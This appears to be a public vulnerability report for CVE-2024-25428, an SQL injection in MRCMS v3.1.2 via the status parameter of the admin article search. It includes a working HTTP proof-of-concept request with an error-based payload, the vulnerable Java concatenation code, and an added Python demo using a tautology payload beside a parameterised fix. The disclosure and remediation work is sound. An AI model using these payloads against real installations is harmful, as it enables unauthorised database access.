Open xia0chensec opened 8 months ago
[The name of an affected Product]
MRCMS
[The affected or fixed version]
v3.1.2
[CVE ID] CVE-2024-25428
[Vulnerability Type]
SQL Injection
[Vulnerability Description]
MRCMS v3.1.2 is vulnerable to SQL injection via the status parameter of the admin article search endpoint (/admin/article.do); the parameter is concatenated into a SQL IN (...) clause without validation or binding.
[Vulnerability details]
The vulnerability exists at the following endpoint. It sits under /admin and the request below carries a JSESSIONID cookie, so reproducing it requires an authenticated session on the admin backend: http://localhost:8080/admin/article.do?cid=1&did=0&status=1&keyword=1&currentPageNo=1&pageSize=20
1. Select Content -> File management
2. Click the search button
SQL injection exists in the status parameter.
POC
The payload is error-based: extractvalue() is handed a malformed XPath expression built from the result of select user(), so if the MySQL error is reflected in the response it echoes the database user name between the two ~ characters.
```http
GET /admin/article.do?cid=1&did=0&status=1+and+extractvalue(1,concat(0x7e,(select+user()),0x7e))&keyword=1123&currentPageNo=1&pageSize=20 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost:8080/admin/index.do
Cookie: JSESSIONID=AD318CA555923823E93DC03659C2B5C0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
```
Code discovery
Code path: MRCMS\src\main\java\org\marker\mushroom\service\impl\ArticleService.java
Excerpt of ArticleService.find (the rest of the method is not shown in the report):
```java
public Page find(int currentPageNo, int pageSize, Map<String,Object> condition) {
    String keyword = (String) condition.get("keyword");
    String status = (String) condition.get("status");   // user-controlled: the status query parameter
    int cid = (Integer)condition.get("cid");
    int did = (Integer)condition.get("did");
    int userGroupId = (Integer)condition.get("userGroupId");
//  try {
//      keyword = new String(keyword.getBytes("ISO-8859-1"),"utf-8");
//  } catch (UnsupportedEncodingException e) {
//      e.printStackTrace();
//  }
    String prefix = config.getPrefix();
    String sql = "select a.id,a.title, a.author,a.views,a.status, a.time, concat('/cms?type=article','&id=',CAST(a.id as char),'&time=',DATE_FORMAT(a.time,'%Y%m%d')) url, c.name as cname ,'article' model, a.stick from "+config.getPrefix()+"article as a " +
            "left join "+prefix+"channel c on c.id = a.cid ";
    sql += "where a.status in ("+status+") ";   // status is concatenated straight into the IN (...) clause
    if(userGroupId != 1){
        sql += " and a.cid in (select cid from "+prefix+"user_group_channel where gid = "+userGroupId+") ";
    }
```
In this code the SQL query string is built through string concatenation. The status value is taken from the request and spliced directly into the `in (...)` clause with no type check or bind parameter, so any SQL placed in the status parameter is executed by the database.
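The following is an added example, not code from the MRCMS project or from this report. It reproduces the reported pattern in Python against an in-memory SQLite table and places it beside a hardened version of the same query. The table name, column set and rows are constructed for the demonstration; the report's extractvalue() payload is MySQL-specific, so the injection point is exercised here with a boolean tautology that breaks out of the IN (...) list instead. The fix shown (validate the list as integers, then bind each value through a placeholder) maps directly onto a JDBC PreparedStatement or a Spring JdbcTemplate call in the Java service.

```python
import re
import sqlite3

# Constructed sample rows standing in for the MRCMS "article" table
# (assumption: id/title/status columns as in the ArticleService excerpt).
ARTICLES = [
    (1, "Public post", 1),
    (2, "Draft post", 0),
    (3, "Hidden post", 2),
]


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article (id integer, title text, status integer)")
    conn.executemany("insert into article values (?, ?, ?)", ARTICLES)
    return conn


def find_vulnerable(status: str):
    """Mirrors the reported code: the status parameter is concatenated
    straight into the IN (...) clause, so it is parsed as SQL."""
    sql = "select id, title from article where status in (" + status + ") order by id"
    with _connect() as conn:
        return conn.execute(sql).fetchall()


def parse_status(status: str):
    """Accept only a comma-separated list of non-negative integers."""
    if not re.fullmatch(r"\s*\d+\s*(,\s*\d+\s*)*", status):
        raise ValueError(f"invalid status list: {status!r}")
    return [int(s) for s in status.split(",")]


def status_is_valid(status: str) -> bool:
    try:
        parse_status(status)
        return True
    except ValueError:
        return False


def find_hardened(status: str):
    """Validate first, then bind every value through a placeholder so the
    user-controlled text never reaches the SQL parser."""
    values = parse_status(status)
    placeholders = ",".join("?" * len(values))
    sql = f"select id, title from article where status in ({placeholders}) order by id"
    with _connect() as conn:
        return conn.execute(sql, values).fetchall()


# Boolean variant of the injection for SQLite: closes the IN list, appends a
# tautology and comments out the rest of the statement.
INJECTION = "1) or 1=1 --"

if __name__ == "__main__":
    print(find_vulnerable("1"))          # only status-1 rows
    print(find_vulnerable(INJECTION))    # every row: the filter is bypassed
    print(find_hardened("1"))
    print("rejected:", not status_is_valid(INJECTION))
```

The hardened builder keeps the IN (...) shape the service needs for a multi-status search; the only difference is that the number of placeholders is derived from the validated list and the values travel as bind parameters rather than as text.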